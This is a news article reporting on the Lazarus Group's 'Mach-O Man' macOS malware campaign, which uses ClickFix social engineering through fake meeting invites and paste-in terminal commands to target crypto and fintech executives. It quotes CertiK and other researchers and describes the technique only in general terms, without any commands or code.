Lazarus Group has become especially dangerous with new Mach-O Man attack: CertiK

Tech Share Share this article Copy link X icon X (Twitter) LinkedIn Facebook Email Lazarus Group has become especially dangerous with new Mach-O Man attack: CertiK North Korea's Lazarus Group has a new attack vector that allows it to exploit an apparently routine business call as a gateway into a target's systems. By Olivier Acuna | Edited by Sheldon Reback Apr 22, 2026, 12:20 p.m. Make preferred on Security expert warn crypto and fintech firms to be cautious of new malware that North Korean hackers and other cybercriminals are using. (Shutterstock) What to know : The North Korean Lazarus Group is running a new macOS-focused campaign dubbed “Mach-O Man” that targets executives at fintech, crypto and other high-value firms through routine business communications. The operation uses a social engineering technique called ClickFix, luring victims to fake online meetings that instruct them to paste a command to fix an apparent communication problem into their Mac terminal, granting attackers access to corporate and financial systems. Researchers say Mach-O Man is a modular malware kit already used beyond Lazarus, and often erases itself before victims realize they have been compromised, making incidents hard to detect or trace. The North Korean state-run Lazarus Group is running a new campaign known as “Mach-O Man” that turns routine business communication into a direct path to credential theft and data loss, security experts warned Wednesday. The collective, with cumulative loot estimated at $6.7 billion since 2017 , is targeting fintech, cryptocurrency and other high-value executives and firms, Natalie Newson, a senior blockchain security researcher at CertiK, told CoinDesk on Wednesday. In the past two weeks alone, the North Korean hackers have siphoned more than $500 million from the Drift and KelpDAO exploits in what appears to be a sustained campaign. The crypto industry needs to start viewing Lazarus the same way banks view nation-state cyber actors: “as a constant and well-funded threat, not just another news headline," she said. "What makes Lazarus especially dangerous right now is their activity level,” Newson said. “KelpDAO, Drift, and now a new macOS malware kit, all within the same month. This isn’t random hacking; it’s a state-directed financial operation running at a scale and speed typical of institutions.” North Korea has turned crypto theft into a lucrative national industry, and Mach-O Man is just the latest product from that process, she said. While Lazarus created it, other cybercrime groups are also using it. “It is a modular macOS malware kit created by Lazarus Group’s infamous Chollima division. It uses native Mach-O binaries tailored for Apple environments where crypto and fintech operate,” she said. Newson said Mach-O Man uses a delivery method known as ClickFix. “It's important to be clear because a lot of coverage is mixing up two separate things,” she noted. ClickFix is a social engineering technique where the victim is asked to paste a command into their terminal to fix a simulated connection issue. It works by Lazarus sending executives an “urgent” meeting invite over Telegram for a Zoom, Microsoft Teams or Google Meet call, according to Mauro Eldritch , a security expert and founder of threat intelligence firm BCA Ltd. The link leads to a fake, but convincing, website that instructs them to copy and paste one simple command into their Mac’s terminal to "fix a connection issue." In doing so, the victims provide immediate access to corporate systems, SaaS platforms and financial resources. By the time they find out they were exploited, it is usually too late. There are several variations of this attack , security threat researcher Vladimir S. said on X. There are already cases where Lazarus attackers have hijacked decentralized finance (DeFI) projects’ domains with this new malware by replacing their websites with a fake message from Cloudflare, asking them to enter a command to grant access. "These fake 'verification steps' guide victims through keyboard shortcuts that run a harmful command," said Certik's Newson. "The page looks real, the instructions seem normal, and the victim initiates the action themselves — which is why traditional security controls often miss it.” Most victims of this hack will not realize their security has been breached until the damage has been done, at which time, the malware will have already erased itself as well. “They likely don’t know it yet," she said. "If they do, they probably can’t identify which variant affected them.” Hack Crime More For You Coinbase advisory board says quantum computing threat is on the horizon, crypto needs a plan By Margaux Nijkerk | Edited by Sheldon Reback 21 hours ago The 50-page paper concludes that while today’s blockchains remain secure, a future “fault-tolerant quantum computer” capable of breaking widely used encryption is increasingly plausible, and preparation must begin now. What to know : A Coinbase-backed report warns that while quantum computers aren’t an immediate threat to crypto, the industry must start preparing now for a future where they could break current encryption. Although post-quantum solutions exist, switching will be complex and costly, pushing major crypto ecosystems like Ethereum and Solana to begin exploring... Read full story Latest Crypto News The signal bitcoin momentum traders have been waiting for is here 1 hour ago Bitcoin tests $78,000 resistance as short-squeeze risks mount, altcoins rally 1 hour ago Flight to safety: How Maker’s Spark and USDC are winning the $10 billion Aave breakup 2 hours ago Traders don’t see Kelp socializing losses after $292 million exploit 2 hours ago A make or break moment: why $79,200 could act as a launchpad or a ceiling for bitcoin 3 hours ago A $575 bet on a Shiba-themed token became $1.17 million in 5 days 3 hours ago Top Stories Tron's Justin Sun sues Trump-linked World Liberty Financial over frozen assets 7 hours ago Bitcoin climbs to $78,100 on Trump ceasefire extension, Strategy's $2.5 billion buy 7 hours ago Another DeFi protocol loses millions in hack days after KelpDAO breach 4 hours ago Bitcoin's 'Coinbase premium' just posted its longest bullish streak since October's record high of $126,000 5 hours ago Kalshi takes on Coinbase, Robinhood with new plan to offer crypto perpetual futures: The Information 18 hours ago